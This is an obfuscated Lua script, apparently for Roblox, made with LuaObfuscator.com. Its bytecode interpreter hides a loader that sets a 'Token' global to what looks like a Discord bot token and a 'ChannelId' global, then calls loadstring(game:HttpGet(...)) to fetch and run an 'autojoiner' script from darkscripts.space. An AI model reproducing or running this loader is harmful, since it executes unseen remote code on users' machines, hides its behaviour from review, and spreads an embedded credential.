--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v105=v5(v81,v19);v19=nil;return v105;else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(878 -(282 + 595)))))%((5 -3)^(((v33-(1 -(1637 -(1523 + 114)))) -(v32-1)) + (2 -1))) ;return v82-(v82%(620 -(499 + 56 + 64))) ;else local v83=0;local v84;while true do if (v83==(931 -(857 + 74))) then v84=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37=0;local v38;local v39;local v40;local v41;while true do if (0==v37) then v38,v39,v40,v41=v1(v16,v18,v18 + (12 -9) );v18=v18 + (121 -(32 + 85)) ;v37=1;end if (v37==(1 + 0)) then return (v41 * (3720433 + 13056783)) + (v40 * (66493 -(892 + 65))) + (v39 * ((1127 -517) -354)) + v38 ;end end end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,351 -(87 + 263) ,20) * ((1 + 1)^32)) + v42 ;local v46=v20(v43,201 -(67 + 113) ,14 + 9 + 8 );local v47=((v20(v43,78 -(167 -121) )==(1 + (0 -0))) and  -(3 -(861 -(814 + 45)))) or (19 -(10 + 8)) ;if (v46==(952 -(802 + 150))) then if (v45==(442 -((1024 -608) + 26))) then return v47 * (0 -0) ;else local v92=0 -(0 + 0) ;while true do if (v92==(0 + 0)) then v46=998 -(915 + 82) ;v44=(0 + 0) -0 ;break;end end end elseif (v46==(3533 -(998 + 488))) then return ((v45==(0 + (885 -(261 + 624)))) and (v47 * (((1 -0) + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2161 -(116 + 1022)) ) * (v44 + (v45/(2^(1239 -(1069 + 118))))) ;end local function v25(v48) local v49;if  not v48 then local v85=1080 -(1020 + 60) ;while true do if (v85==(1423 -(630 + 793))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v64=4 -(2 + 1) , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v51==(1 + 1)) then for v93= #"{",v23() do local v94=(function() return v21();end)();if (v20(v94, #"]", #",")~=(1636 -(1373 + 263))) then else local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v101==(0 + 0)) then local v106=(function() return 0;end)();while true do if (v106==(1 + 0)) then v101=(function() return 1 -0 ;end)();break;end if (v106~=(0 -0)) then else v102=(function() return v20(v94,2, #"xnx");end)();v103=(function() return v20(v94, #"http",6);end)();v106=(function() return 1;end)();end end end if (v101==(4 -1)) then if (v20(v103, #"91(", #"xnx")== #"|") then v104[ #"?id="]=(function() return v57[v104[ #".com"]];end)();end v52[v93]=(function() return v104;end)();break;end if (v101~=(5 -3)) then else if (v20(v103, #"]", #"<")~= #" ") then else v104[2]=(function() return v57[v104[2 + 0 ]];end)();end if (v20(v103,1 + 1 ,2 + 0 )== #"]") then v104[ #"-19"]=(function() return v57[v104[ #"nil"]];end)();end v101=(function() return 344 -(218 + 123) ;end)();end if ((397 -(115 + 281))~=v101) then else local v108=(function() return 0 -0 ;end)();local v109=(function() return;end)();while true do if (0==v108) then v109=(function() return 0;end)();while true do if (v109==(1 + 0)) then v101=(function() return 4 -2 ;end)();break;end if (v109==(0 -0)) then v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(867 -(550 + 317))) then local v174=(function() return 0 -0 ;end)();local v175=(function() return;end)();while true do if (v174==(0 -0)) then v175=(function() return 0 -0 ;end)();while true do if (v175==(0 -0)) then v104[ #"-19"]=(function() return v22();end)();v104[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v102== #":") then v104[ #"xxx"]=(function() return v23();end)();elseif (v102==2) then v104[ #"-19"]=(function() return v23() -((1469 -(899 + 568))^(301 -(134 + 151))) ;end)();elseif (v102~= #"xxx") then else local v180=(function() return 0 + 0 ;end)();local v181=(function() return;end)();while true do if (v180==(0 -0)) then v181=(function() return 1665 -(970 + 695) ;end)();while true do if (v181==(0 -0)) then v104[ #"91("]=(function() return v23() -((1992 -(582 + 1408))^(306 -(60 + 230))) ;end)();v104[ #"0313"]=(function() return v22();end)();break;end end break;end end end v109=(function() return 573 -(426 + 146) ;end)();end end break;end end end end end end for v95= #":",v23() do v53[v95-#"<" ]=(function() return v28();end)();end return v55;end if (v51== #":") then local v89=(function() return 0 + 0 ;end)();local v90=(function() return;end)();while true do if (v89~=0) then else v90=(function() return 1456 -(282 + 1174) ;end)();while true do if (v90~=(6 -4)) then else v51=(function() return 2;end)();break;end if (v90==(1 -0)) then for v111= #"]",v56 do local v112=(function() return 0 + 0 ;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v112==(1025 -(706 + 318))) then v115=(function() return nil;end)();while true do if (v113==(3 -2)) then if (v114== #"[") then v115=(function() return v21()~=(1824 -(1195 + 629)) ;end)();elseif (v114==(2 -0)) then v115=(function() return v24();end)();elseif (v114~= #"19(") then else v115=(function() return v25();end)();end v57[v111]=(function() return v115;end)();break;end if (v113==(0 -0)) then local v173=(function() return 241 -(187 + 54) ;end)();while true do if (1~=v173) then else v113=(function() return 781 -(162 + 618) ;end)();break;end if (v173~=(0 + 0)) then else v114=(function() return v21();end)();v115=(function() return nil;end)();v173=(function() return 1 + 0 ;end)();end end end end break;end if (v112==(0 + 0)) then v113=(function() return 0;end)();v114=(function() return nil;end)();v112=(function() return 1 -0 ;end)();end end end v55[ #"19("]=(function() return v21();end)();v90=(function() return 1502 -(1408 + 92) ;end)();end if (v90==0) then v56=(function() return v23();end)();v57=(function() return {};end)();v90=(function() return 1 -0 ;end)();end end break;end end end if (v51~=(1288 -(993 + 295))) then else local v91=(function() return 0;end)();while true do if (v91~=(0 + 0)) then else v52=(function() return {};end)();v53=(function() return {};end)();v91=(function() return 1172 -(418 + 753) ;end)();end if (v91==1) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v91=(function() return 2;end)();end if (v91==(1 + 1)) then v51=(function() return  #">";end)();break;end end end end end local function v29(v58,v59,v60) local v61=v58[1 + (0 -0) ];local v62=v58[1 + 1 ];local v63=v58[1 + 2 ];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=530 -(406 + 48 + 75) ;local v71= -(2 -1);local v72={};local v73={...};local v74=v12("#",...) -((1 -0) + 0) ;local v75={};local v76={};for v86=0,v74 do if ((v86>=v68) or (4177>4850)) then v72[v86-v68 ]=v73[v86 + 1 + (0 -0) ];else v76[v86]=v73[v86 + ((2550 -(322 + 905)) -(1249 + 73)) ];end end local v77=(v74-v68) + 1 + (611 -(602 + 9)) ;local v78;local v79;while true do v78=v66[v70];v79=v78[1146 -((1655 -(449 + 740)) + 679) ];if ((v79<=(21 -12)) or (4983<1808)) then if (v79<=(11 -7)) then if (v79<=(1901 -(106 + 1794))) then if (v79>(0 + (872 -(826 + 46)))) then v76[v78[1 + 1 ]]();else v70=v78[8 -5 ];end elseif (v79<=(733 -(476 + 255))) then v70=v78[1133 -(369 + 761) ];elseif (v79>(7 -4)) then local v135=114 -(4 + (1057 -(245 + 702))) ;local v136;while true do if (v135==(0 -0)) then v136=v78[586 -(57 + 527) ];v76[v136]=v76[v136](v13(v76,v136 + (1428 -(41 + 1386)) ,v71));break;end end else v76[v78[105 -(17 + 86) ]]=v78[3 + (0 -0) ];end elseif (v79<=(13 -7)) then if (v79==(14 -9)) then v60[v78[3]]=v76[v78[168 -(122 + 44) ]];else local v120=216 -(42 + 174) ;local v121;local v122;while true do if ((v120==(1 -0)) or (400>1111)) then v76[v121 + 1 + 0 ]=v122;v76[v121]=v122[v78[12 -8 ]];break;end if (v120==((484 + 1020) -(363 + 1141))) then v121=v78[2 + 0 ];v122=v76[v78[1 + 2 ]];v120=1;end end end elseif ((3051>1005) and (v79<=(13 -6))) then do return;end elseif (v79>(73 -(30 + 35))) then do return;end else local v139=1898 -(260 + 1638) ;local v140;while true do if (v139==(0 + 0)) then v140=v78[1259 -(1043 + 214) ];v76[v140]=v76[v140](v13(v76,v140 + (3 -2) ,v71));break;end end end elseif ((3829>3769) and (3693<=4382) and (v79<=(1226 -(323 + 889)))) then if (v79<=11) then if (v79==(26 -16)) then v76[v78[582 -(361 + 219) ]]=v78[323 -(53 + 267) ];elseif (v76[v78[1 + 1 ]]==v78[1937 -(565 + 1368) ]) then v70=v70 + (414 -(15 + 398)) ;else v70=v78[(2104 -(382 + 58)) -(1477 + 184) ];end elseif (v79<=(994 -(18 + 964))) then v60[v78[11 -8 ]]=v76[v78[2 + (0 -0) ]];elseif (v79>(8 + 5 + 0)) then v76[v78[2 -0 ]]=v60[v78[2 + 1 ]];else v76[v78[(1760 -908) -((59 -39) + 830) ]]=v60[v78[307 -((1449 -(902 + 303)) + 60) ]];end elseif (v79<=(13 + 3)) then if (v79==(12 + 3)) then if ((v76[v78[(280 -152) -(116 + (24 -14)) ]]==v78[1 + 0 + 3 ]) or (3282>4100)) then v70=v70 + ((2429 -(1121 + 569)) -(542 + 196)) ;else v70=v78[3];end else local v127=0 -0 ;local v128;local v129;local v130;local v131;while true do if ((1485<=2904) and ((v127==(1 + 1)) or (3580<2844))) then for v165=v128,v71 do v131=v131 + 1 + 0 ;v76[v165]=v129[v131];end break;end if (v127==(1125 -(936 + 189))) then v128=v78[(215 -(22 + 192)) + 1 ];v129,v130=v69(v76[v128](v13(v76,v128 + (2 -1) ,v78[686 -(483 + 200) ])));v127=1 + 0 ;end if (v127==(2 -1)) then v71=(v130 + v128) -(1552 -(1126 + 425)) ;v131=0;v127=407 -(118 + 287) ;end end end elseif (v79<=(66 -49)) then v76[v78[1123 -(118 + 1003) ]]();elseif ((89<4490) and (v79==(52 -34))) then local v147=v78[379 -(142 + 235) ];local v148,v149=v69(v76[v147](v13(v76,v147 + (1876 -(157 + 1718)) ,v78[3 + 0 ])));v71=(v149 + v147) -(4 -3) ;local v150=0 + 0 ;for v162=v147,v71 do v150=v150 + (978 -(553 + 424)) ;v76[v162]=v148[v150];end else local v151=v78[3 -1 ];local v152=v76[v78[3 + 0 ]];v76[v151 + 1 + 0 ]=v152;v76[v151]=v152[v78[(1466 -(1404 + 59)) + 1 ]];end v70=v70 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F6175746F6A6F696E65722E6C756103053Q00546F6B656E03483Q004D5449354D6A41324D4455794E4451314D546B354D5459304D672E4749315273712E6F6B524C4F742Q38735739566D48492D443138744833493963452D36622D437767706C684C6B03093Q004368612Q6E656C496403133Q003132393635313834373139343037303634303600143Q0012033Q00013Q00260F3Q000B0001000200044Q000B000100120E000100033Q00120E000200043Q002006000200020005001203000400064Q0010000200044Q000800013Q00022Q001100010001000100044Q0013000100260F3Q00010001000100044Q00010001001203000100083Q001205000100073Q0012030001000A3Q001205000100093Q0012033Q00023Q00044Q000100012Q00093Q00017Q00",v9(),...);
